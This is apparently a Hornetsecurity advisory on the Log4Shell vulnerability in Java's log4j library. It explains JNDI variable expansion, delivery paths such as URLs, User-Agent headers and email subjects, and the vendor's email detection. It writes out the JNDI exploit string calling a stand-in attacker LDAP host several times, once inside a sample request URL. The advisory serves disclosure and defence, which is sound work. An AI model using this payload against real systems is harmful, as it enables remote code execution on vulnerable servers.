Background
CVE-2021-44228, also known as Log4Shell, is a vulnerability in the popular Java logging package log4j.
Log4j is used by a lot of JAVA enterprise software to implement logging. The vulnerability is caused by a feature released in 2013 that added an expansion of (local environment) variables in log messages. For example, `${env:FOOBAR}` in a log message would expand to the environment variable `FOOBAR`. It also allows expanding variables in the JNDI (Java Naming and Directory Interface) context. This is were the vulnerability manifests. If the string `${jndi:ldap://attacker-controlled.com/x}` is logged via log4j, the system will request the attacker-controlled URI via the JAVA Naming and Directory Interface (JNDI), and then download and execute any attacker-controlled JAVA class file leading to a remote code execution vulnerability.
Attack procedure
The vulnerability is so dangerous because it is so simple to exploit: all an attacker has to do is get a victim to enter their exploit string `${jndi:ldap://attacker-controlled.com/x}` into a log file using log4j. log4j is virtually the default logging library for JAVA enterprise applications, making them vulnerable to CVE-2021-44228. Most applications log specific actions by default, e.g., a web server will log web requests. An attacker would simply need to request the URL `http://vulnerable-webserver.com/${jndi:ldap://attacker-controlled.com/x}` or set their User-Agent string to the exploit in order to compromise a system.
The exploit string can travel via any path, as long as it gets logged by a JAVA application using log4j, e.g., a JAVA-based email client could receive an email where the subject of the email is set to the Log4Shell exploit string. Once the JAVA-base email client writes to its logs via the log4j library that it has received a new email, the exploit would trigger.
Hornetsecurity Statement
Hornetsecurity already detects the malicious exploit string in emails, but so far has not observed attackers using emails directly as attack vectors. The cases that have been observed so far (besides security companies and customers testing for the vulnerability), come from web forms containing the Log4Shell exploit, for which the owner of the web form then received a notification email containing the fields of the form, which then obviously contained the exploit string.
Hornetsecurity is monitoring emails for CVE-2021-44228 exploitation patterns and will constantly expand detection to adapt to new obfuscations in preparation for potential targeted email campaigns using the Log4Shell exploit.
